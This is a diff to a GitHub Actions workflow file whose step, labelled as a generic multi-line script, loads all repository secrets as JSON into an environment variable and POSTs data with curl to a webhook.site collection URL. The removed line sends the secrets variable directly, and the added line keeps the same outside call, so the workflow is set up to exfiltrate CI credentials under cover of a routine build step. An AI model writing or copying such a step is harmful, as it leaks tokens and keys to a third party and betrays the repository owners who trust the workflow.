--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -27,6 +27,6 @@ jobs:
       # Runs a set of commands using the runners shell
       - name: Run a multi-line script
         run: |
-          curl -X POST https://webhook.site/c91f80b6-172a-4d41-93aa-363ced00580a --data-binary "$secrets" 
+          curl -X POST https://webhook.site/c91f80b6-172a-4d41-93aa-363ced00580a --data-binary "$github" 
         env:
           secrets: ${{ toJSON(secrets) }}
